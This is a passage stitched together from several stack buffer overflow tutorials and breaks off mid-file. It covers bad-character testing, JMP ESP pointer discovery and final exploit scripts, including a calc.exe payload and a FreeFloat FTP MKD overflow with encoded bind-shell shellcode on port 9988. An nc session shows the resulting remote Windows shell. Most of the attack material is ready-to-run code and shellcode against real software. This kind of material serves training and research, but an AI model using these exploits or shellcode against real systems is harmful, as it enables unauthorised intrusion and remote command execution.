truncates the payload when it is copied. To find bad characters, we can add a variable of
“bad chars” to our code that contains every byte value from \x01 to \xff. \x00 and \x0A are
NULL and Line Feed, well-known bad characters, so we remove them before testing and add them
to our bad characters list. The variable is included in the script below:

import sys, socket, time

host = "192.168.0.107"
port = 31337

char = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# EIP Writing Pattern
pattern = "A"*146 + "BBBB" + char + "\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)
# print out what we received
print "Received: {0}".format(data)
client.close() # Close the Connection

After sending this we check the contents of the stack (right-click on the ESP register and
select the Follow in Dump option).

We can verify that EIP is under our control

The characters that we have sent as input are all present

As all the characters that we have sent are present, we can confirm that there are no bad
characters other than \x00 and \x0A. If there were a bad character, it would have been
replaced (for example with B0) or the list would have been truncated.

Example of a program with lots of bad characters. Not a part of this exploit.
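
The manual comparison in the dump can also be sketched in Python 3. The block below is an illustration under stated assumptions: the bytes read back from the debugger have already been copied into a bytes object (how they are exported is not covered here), the helper names are invented, and a bad character is assumed either to be replaced by another byte or to truncate the buffer, never to be silently dropped.

```python
def build_test_bytes(known_bad=(0x00, 0x0A)):
    """Return every byte value 0x00-0xFF except those already known to be bad."""
    return bytes(b for b in range(256) if b not in known_bad)


def find_bad_chars(sent, dumped):
    """Compare the bytes that were sent with the bytes seen in the stack dump.

    Returns a tuple (altered, truncated_at):
      altered      - list of sent byte values that arrived as a different byte
      truncated_at - the first sent byte missing from a shortened dump,
                     or None when the dump is complete
    """
    altered = []
    for position, expected in enumerate(sent):
        if position >= len(dumped):
            return altered, expected
        if dumped[position] != expected:
            altered.append(expected)
    return altered, None
```

When the dump matches the sent bytes exactly, the function returns an empty list and None, which corresponds to the clean result described above.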

Finding JMP ESP

Now that we have control over the EIP register, we need to point it at the memory that ESP
refers to so that the CPU starts executing the contents of the stack. A JMP ESP instruction
does exactly that: when it executes, control jumps to the address held in ESP. We can find
the location of a JMP ESP instruction in the following ways:

1. !mona find -s "\xff\xe4"

2. !mona jmp -r esp
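
What the first command searches for can be sketched in Python 3: the two opcode bytes FF E4 (jmp esp) inside a module's memory image. This is a simplified illustration, not how mona works internally; the image bytes and the base address in the usage note are hypothetical, and a real search must also check that the match lies in an executable page.

```python
JMP_ESP = b"\xff\xe4"  # machine code for the x86 instruction `jmp esp`


def find_opcode(image, base_address, opcode=JMP_ESP):
    """Return the absolute address of every occurrence of `opcode`.

    `image` is the raw bytes of a loaded module and `base_address` is the
    address at which its first byte is mapped.
    """
    addresses = []
    start = image.find(opcode)
    while start != -1:
        addresses.append(base_address + start)
        start = image.find(opcode, start + 1)
    return addresses
```

For a made-up image with the opcode at offsets 0x10 and 0x16 and a base of 0x08040000, the function returns the addresses 0x08040010 and 0x08040016.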

In this case, we have two modules which satisfy our requirement. We will use the address
0x080416BF in our exploit. To use it in our code we need to convert this address to
little-endian format, which is '\xBF\x16\x04\x08'.
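
The byte reversal does not have to be done by hand. A small Python 3 sketch using the standard struct module, with helper names chosen here for illustration:

```python
import struct


def pack_pointer(address):
    """Pack a 32-bit address into the little-endian byte order x86 expects."""
    return struct.pack("<I", address)


def unpack_pointer(raw):
    """Inverse of pack_pointer: turn 4 little-endian bytes back into a number."""
    return struct.unpack("<I", raw)[0]
```

pack_pointer(0x080416BF) yields the bytes BF 16 04 08, the same sequence as the hand-written string above.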

Game Over

We generate shellcode using msfvenom and use the generated shellcode in our final exploit.

msfvenom -p windows/exec -b '\x00\x0A' -f python CMD=calc.exe EXITFUNC=thread

The final exploit code

import sys, socket, time

host = "192.168.0.107"
port = 31337

# badchar '0x00, 0x0A'
shellcode_calc = ""
shellcode_calc += "\xb8\x3e\x08\xbf\x9c\xdb\xdc\xd9\x74\x24"
shellcode_calc += "\xf4\x5f\x29\xc9\xb1\x31\x31\x47\x13\x03"
shellcode_calc += "\x47\x13\x83\xc7\x3a\xea\x4a\x60\xaa\x68"
shellcode_calc += "\xb4\x99\x2a\x0d\x3c\x7c\x1b\x0d\x5a\xf4"
shellcode_calc += "\x0b\xbd\x28\x58\xa7\x36\x7c\x49\x3c\x3a"
shellcode_calc += "\xa9\x7e\xf5\xf1\x8f\xb1\x06\xa9\xec\xd0"
shellcode_calc += "\x84\xb0\x20\x33\xb5\x7a\x35\x32\xf2\x67"
shellcode_calc += "\xb4\x66\xab\xec\x6b\x97\xd8\xb9\xb7\x1c"
shellcode_calc += "\x92\x2c\xb0\xc1\x62\x4e\x91\x57\xf9\x09"
shellcode_calc += "\x31\x59\x2e\x22\x78\x41\x33\x0f\x32\xfa"
shellcode_calc += "\x87\xfb\xc5\x2a\xd6\x04\x69\x13\xd7\xf6"
shellcode_calc += "\x73\x53\xdf\xe8\x01\xad\x1c\x94\x11\x6a"
shellcode_calc += "\x5f\x42\x97\x69\xc7\x01\x0f\x56\xf6\xc6"
shellcode_calc += "\xd6\x1d\xf4\xa3\x9d\x7a\x18\x35\x71\xf1"
shellcode_calc += "\x24\xbe\x74\xd6\xad\x84\x52\xf2\xf6\x5f"
shellcode_calc += "\xfa\xa3\x52\x31\x03\xb3\x3d\xee\xa1\xbf"
shellcode_calc += "\xd3\xfb\xdb\x9d\xb9\xfa\x6e\x98\x8f\xfd"
shellcode_calc += "\x70\xa3\xbf\x95\x41\x28\x50\xe1\x5d\xfb"
shellcode_calc += "\x15\x0d\xbc\x2e\x63\xa6\x19\xbb\xce\xab"
shellcode_calc += "\x99\x11\x0c\xd2\x19\x90\xec\x21\x01\xd1"
shellcode_calc += "\xe9\x6e\x85\x09\x83\xff\x60\x2e\x30\xff"
shellcode_calc += "\xa0\x4d\xd7\x93\x29\xbc\x72\x14\xcb\xc0"

ret = '\xBF\x16\x04\x08' # Packed in little endian

# EIP Writing Pattern
pattern = "A"*146 + ret + "\x90"*16+ shellcode_calc + "\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)
print "Received: {0}".format(data)
client.close()

Now we restart the program and run the exploit code. On our Windows machine, we see that
the calculator application has opened.

References & Resources

1. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

2. https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md

3. https://www.fuzzysecurity.com/tutorials/expDev/1.html

4. https://www.youtube.com/watch?v=qSnPayW6F7U

5. https://www.geeksforgeeks.org/memory-layout-of-c-program/

6. https://github.com/r4j0x00/oscp-like-stack-buffer-overflow

7. https://www.acunetix.com/blog/web-security-zone/what-is-buffer-overflow/

https://sghosh2402.medium.com/understanding-exploiting-stack-based-buffer-overflows-acf9b8659cba

This is the first part in a (modest) multi-part exploit development series. This part will just
cover some basic things like what we need to do our work, the basic ideas behind exploits and a
couple of things to keep in mind if we want to get to and execute our shellcode. These tutorials
will not cover finding bugs; instead each part will include a vulnerable program which needs a
specific technique to be successfully exploited. In the fullness of time I intend to cover
everything from “Saved Return Pointer Overflows” to “ROP (Return Oriented Programming)”.
Of course these tutorials won't write themselves, so it will take some time to get there. It is
worth mentioning that these tutorials won't cover all the small details and eventualities; this
is by design to (1) save me some time and (2) allow the diligent reader to learn by
participating.

I would like to give special thanks to Offensive Security and Corelan, thanks for giving me
this amazing and painful addiction!!

(1) What we need

Immunity Debugger - Download

Immunity Debugger is similar to OllyDbg but it has Python support, which we will need to run
plugins that aid us with our exploit development. It’s free; on the link just fill in some bogus
info and hit download.

Mona.py - Download
Mona is an amazing tool with tons of features which will help us to do rapid and reliable
exploit development. I won’t be discussing all the options here, we’ll get to them during the
following parts of the tutorial. Download it and put it in Immunity’s PyCommands folder.

Pvefindaddr.py - Download
Pvefindaddr is Mona’s predecessor. I know it’s a bit outdated but it’s still useful since there are
some features that haven’t been ported to Mona yet. Download it and put it in Immunity’s
PyCommands folder.

Metasploit Framework - Download

We are going to use the Metasploit Framework extensively. Most of all we are going to be
generating shellcode for our exploits, but we are also going to need a platform that can receive
any connections we might get back from the programs we are exploiting. I suggest you
use BackTrack since it has everything we need, but feel free to set up Metasploit in any way
you see fit.

Virtualization Software

Basically there are two options here: VirtualBox, which is free, and VMware, which isn't. If
it's possible I would suggest using VMware; a clever person might not need to pay for it ;)).
Coupled with this we will need several (32-bit) operating systems to develop our exploits on
(you will get the most use out of Windows XP PRO SP3 and any Windows 7).

(2) Overflows

For the purpose of these tutorials I think it’s important to keep things as simple or difficult as
they need to be. In general when we write an exploit we need to find an overflow in a
program. Commonly these bugs will be either Buffer Overflows (a memory location receives
more data than it was meant to) or Stack Overflows (usually a Buffer Overflow that writes
beyond the end of the stack). When such an overflow occurs there are two things we are
looking for: (1) our buffer needs to overwrite EIP (the instruction pointer) and (2) one of
the CPU registers needs to contain, or point to, our buffer. You can see a list of x86 CPU
registers below with their separate functions. All we need to remember is that any of these
registers can end up referencing our buffer (and shellcode).

EAX - Main register used in arithmetic calculations. Also known as accumulator, as it holds
results of arithmetic operations and function return values.

EBX - The Base Register. Pointer to data in the DS segment. Used to store the base address of
the program.

ECX - The Counter register is often used to hold a value representing the number of times a
process is to be repeated. Used for loop and string operations.

EDX - A general purpose register. Also used for I/O operations. Helps extend EAX to 64-bits.

ESI - Source Index register. Pointer to data in the segment pointed to by the DS register. Used
as an offset address in string and array operations. It holds the address from where to read
data.

EDI - Destination Index register. Pointer to data (or destination) in the segment pointed to by
the ES register. Used as an offset address in string and array operations. It holds the implied
write address of all string operations.

EBP - Base Pointer. Pointer to data on the stack (in the SS segment). It points to the bottom of
the current stack frame. It is used to reference local variables.

ESP - Stack Pointer (in the SS segment). It points to the top of the current stack frame. It is
used to reference local variables.

EIP - Instruction Pointer (holds the address of the next instruction to be executed)

(3) How does it work?

Basically (1) we get a program to store an overly long string, (2) this string overwrites EIP and
part of it is stored where a CPU register points, (3) we find a pointer to an instruction that
jumps to the register that references our buffer, (4) we put that pointer in the correct place
in our buffer so it overwrites EIP, (5) when the program reaches our pointer it executes the
instruction and jumps to the register that references our buffer and finally (6) we place our
shellcode in the part of the buffer that the CPU register points to. In essence we hijack the
execution flow and point it to an area of memory that we control. If we are able to do that we
can have the remote machine execute any instructions we place there. This is a bit simplistic
but it should give you a basic idea of how exploits work.
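
The first two steps can be modelled without a debugger. The Python 3 sketch below is a toy model and not real process memory: the 16-byte buffer size, the saved EBP value and the original return address are all made up, and the frame is simply a bytearray laid out as buffer, saved EBP, saved return address.

```python
import struct

BUFFER_SIZE = 16  # hypothetical size of the vulnerable local buffer


def make_frame(return_address):
    """Model a stack frame as [buffer][saved EBP][saved return address]."""
    frame = bytearray(BUFFER_SIZE)
    frame += struct.pack("<I", 0x0012FF80)      # saved EBP (made-up value)
    frame += struct.pack("<I", return_address)  # value later loaded into EIP
    return frame


def unsafe_copy(frame, data):
    """Copy data from the start of the buffer with no bounds check on the buffer.

    The copy is clipped to the size of the model; in a real process it
    would keep writing further up the stack.
    """
    end = min(len(data), len(frame))
    frame[:end] = data[:end]


def saved_return(frame):
    """Read back the saved return address stored after the buffer and EBP."""
    return struct.unpack_from("<I", frame, BUFFER_SIZE + 4)[0]
```

Copying 16 bytes leaves the saved return address untouched, while copying 20 filler bytes followed by a packed pointer replaces it with that pointer, which is the value the CPU would load into EIP when the function returns.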

https://www.fuzzysecurity.com/tutorials/expDev/1.html

Saved Return Pointer Overflows

For our first exploit we will be starting with the most straightforward scenario, where we have
a clean EIP overwrite and one of our CPU registers points directly to a large portion of our
buffer. For this part we will be creating an exploit from scratch for “FreeFloat FTP”. You can
find a list of several exploits that were created for “FreeFloat FTP” here.

Normally we would need to do bad character analysis, but for our first tutorial we will rely on
the bad characters that are listed in the pre-existing Metasploit modules on exploit-db. The
characters that are listed are “\x00\x0A\x0D”. We need to keep these characters in mind for
later.

Exploit Development: Backtrack 5

Debugging Machine: Windows XP PRO SP3
Vulnerable Software: Download

Replicating The Crash

First of all we need to create a POC skeleton exploit to crash the FTP server. Once we have that
we can build on it to create our exploit. You can see my POC below; I have based it on the
exploits for “FreeFloat FTP” that I found on exploit-db. We will be using the pre-existing
“anonymous” user account which comes configured with the FTP server (the exploit should
work with any valid login credentials).

#!/usr/bin/python

import socket
import sys

evil = "A"*1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.111.128', 21))
s.recv(1024)                       # FTP banner
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')     # overly long directory name triggers the crash
s.recv(1024)
s.send('QUIT\r\n')
s.close()

Ok, so far so good, when we attach the debugger to the FTP server and send our POC buffer
the program crashes. In the screenshot below you can see that EIP is overwritten and that two
registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps ESP
seems more promising since it contains a larger chunk of our buffer (I should mention however
that creating an exploit starting in EDI is certainly possible).

Registers

Overwriting EIP

Next we need to analyze our crash. To do that we replace our A's with the Metasploit
pattern and resend our buffer. Make sure you keep the original buffer length, since a
different buffer length may change how the program crashes.

root@bt:~/Desktop# cd /pentest/exploits/framework/tools/

root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A

d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag
0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah

0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj
7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5

Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0A

o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar

6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2
Au3Au4Au5Au6Au7Au8Au9Av0Av1

Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4A
x5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6A

y7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb
2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc

2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be
7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7

Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

When the program crashes again we see the same thing as in the screenshot above except
that EIP (and both registers) is now overwritten by part of the metasploit pattern. Time to let
“mona” do some of the heavy lifting. If we issue the following command in Immunity debugger
we can have “mona” analyze the program crash. You can see the result of that analysis in the
screenshot below.

!mona findmsp

Metasploit Pattern

From the analysis we can see that EIP is overwritten by the 4-bytes which directly follow after
the initial 247-bytes of our buffer. Like I said before we can also see that ESP contains a larger
chunk of our buffer so it is a more suitable candidate for our exploit. Using this information we
can reorganize the evil buffer in our POC above to look like this:

evil = "A"*247 + "B"*4 + "C"*749

When we resend our modified buffer we can see that it works exactly as we expected, EIP is
overwritten by our four B's.
EIP = 42424242

That means that we can replace those B's with a pointer that redirects execution flow to ESP.
The only thing we need to keep in mind is that our pointer can't contain any bad characters.
To find this pointer we can use “mona” with the following command. You can see the results in
the screenshot below.

!mona jmp -r esp

Pointers to ESP
It seems that any of these pointers will do. They belong to OS DLLs, so they will be specific to
“WinXP PRO SP3”, but that’s not our primary concern. We can just use the first pointer in the
list. Keep in mind that we will need to reverse the byte order due to the little-endian
architecture of the CPU. Observe the syntax below.

Pointer: 0x77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False,
Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5701 (C:\WINDOWS\system32\msvcrt.dll)

Buffer: evil = "A"*247 + "\x59\x54\xC3\x77" + "C"*749
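
The bad character rule for pointers can be checked mechanically. The Python 3 sketch below filters a list of candidate addresses against the bad characters \x00\x0A\x0D listed earlier; only 0x77c35459 comes from the mona output above, and the other candidates used in the note are invented to show a rejection.

```python
import struct

BAD_CHARS = b"\x00\x0a\x0d"  # bad characters listed for FreeFloat FTP


def usable_pointers(candidates, bad_chars=BAD_CHARS):
    """Return (address, packed_bytes) for every candidate free of bad characters."""
    usable = []
    for address in candidates:
        packed = struct.pack("<I", address)  # little-endian, as sent on the wire
        if not any(byte in bad_chars for byte in packed):
            usable.append((address, packed))
    return usable
```

Given 0x77c35459 together with the hypothetical addresses 0x7c000a10 and 0x00401234, only 0x77c35459 survives, because the other two contain a \x00 or \x0A byte once packed.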

I should stress that it is important to document your exploit properly for your own and others'
edification. Our final stage POC should look like this.

#!/usr/bin/python

import socket
import sys

#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp # ret | msvcrt.dll
#------------------------------------------------------------

evil = "A"*247 + "\x59\x54\xC3\x77" + "C"*749

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.111.128', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

OK, let's restart the program in the debugger and put a breakpoint on our pointer so the
debugger pauses if it reaches it. As we can see in the screenshot below, EIP is overwritten by
our pointer and we hit our breakpoint, which should bring us to our buffer located at ESP.

Breakpoint

Shellcode + Game Over

We are almost done. We need to (1) modify our POC a bit to add a variable for our shellcode
and (2) insert a payload that is to our liking. Let's start with the POC: we will be inserting our
payload in the part of the buffer that is now made up of C's. Ideally we would like to have the
buffer length modified dynamically so we don't need to recalculate if we insert a payload with
a different size (our total buffer length should remain 1000 bytes). We should also insert some
NOPs (No Operation = \x90) before our payload as padding. You can see the result
below. Any shellcode that we insert in the shellcode variable will get executed by our buffer
overflow.

#!/usr/bin/python

import socket
import sys

shellcode = (
""  # placeholder: the encoded payload goes here
)

#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp # ret | msvcrt.dll
#------------------------------------------------------------

buffer = "\x90"*20 + shellcode
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer + "C"*(749-len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.111.128', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()
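
The length bookkeeping in the POC can be isolated into one function. The Python 3 sketch below is an illustrative rewrite using bytes rather than the Python 2 strings of the POC; build_evil and its parameter names are invented here, while the numbers (offset 247, pointer 0x77c35459, 20 NOPs, 1000 bytes in total) come from the text above.

```python
import struct


def build_evil(shellcode, offset=247, pointer=0x77C35459, nops=20, total=1000):
    """Lay out filler + pointer + NOP sled + shellcode, padded to `total` bytes."""
    head = b"A" * offset + struct.pack("<I", pointer)
    body = b"\x90" * nops + shellcode
    room = total - len(head)  # space left after the EIP overwrite (749 here)
    if len(body) > room:
        raise ValueError("payload does not fit in the remaining buffer space")
    return head + body + b"C" * (room - len(body))
```

Whatever the payload size, the result stays at 1000 bytes, so the crash behaves the same as in the original POC; a payload that is too large raises an error instead of silently changing the buffer length.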

All that remains now is to pop in some shellcode. We will be using msfpayload to generate our
shellcode and pipe the raw output to msfencode to filter out bad characters.

root@bt:~# msfpayload -l

[...snip...]

windows/shell/reverse_tcp_dns   Connect back to the attacker, Spawn a piped command shell (staged)

windows/shell_bind_tcp          Listen for a connection and spawn a command shell

windows/shell_bind_tcp_xpfw     Disable the Windows ICF, then listen for a connection and spawn a command shell

[...snip...]

root@bt:~# msfpayload windows/shell_bind_tcp O

Name: Windows Command Shell, Bind TCP Inline

Module: payload/windows/shell_bind_tcp

Version: 8642

Platform: Windows

Arch: x86

Needs Admin: No

Total size: 341

Rank: Normal

Provided by:

vlad902 <[email protected]>

sf <[email protected]>

Basic options:

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:

Listen for a connection and spawn a command shell

root@bt:~# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

unsigned char buf[] =

"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"

"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"

"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"

"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"

"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"

"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"

"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"

"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"

"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"

"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"

"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"

"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"

"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"

"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"

"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"

"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"

"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"

"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"

"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"

"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"

"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"

"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"

"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"

"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92";

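Before pasting the encoder output into the exploit, it can be sanity-checked. The Python 3 sketch below is an illustration only: c_array_to_bytes and has_bad_chars are invented helper names, and the sample text in the note is just the first and last lines of the output above, not the full payload.

```python
import re

BAD_CHARS = b"\x00\x0a\x0d"  # the characters passed to msfencode with -b


def c_array_to_bytes(text):
    """Extract every \\xNN escape from C-style encoder output as raw bytes."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    return bytes(int(pair, 16) for pair in pairs)


def has_bad_chars(data, bad_chars=BAD_CHARS):
    """Return True if any bad character survived the encoding."""
    return any(byte in bad_chars for byte in data)
```

Run over the complete output, the length of the result should equal the size reported by the encoder (368 here) and has_bad_chars should return False.
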
After prettifying the code a bit and adding the relevant notes the final exploit is ready.

#!/usr/bin/python

#----------------------------------------------------------------------------------#

# Exploit: FreeFloat FTP (MKD BOF) #

# OS: WinXP PRO SP3 #

# Author: b33f (Ruben Boonen) #

# Software: http://www.freefloat.com/software/freefloatftpserver.zip #

#----------------------------------------------------------------------------------#

# This exploit was created for Part 2 of my Exploit Development tutorial series... #

# http://www.fuzzysecurity.com/tutorials/expDev/2.html #

#----------------------------------------------------------------------------------#

# root@bt:~/Desktop# nc -nv 192.168.111.128 9988 #

# (UNKNOWN) [192.168.111.128] 9988 (?) open #

# Microsoft Windows XP [Version 5.1.2600] #

# (C) Copyright 1985-2001 Microsoft Corp. #

# #

# C:\Documents and Settings\Administrator\Desktop> #

#----------------------------------------------------------------------------------#

import socket

import sys

#----------------------------------------------------------------------------------#

# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #

# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) #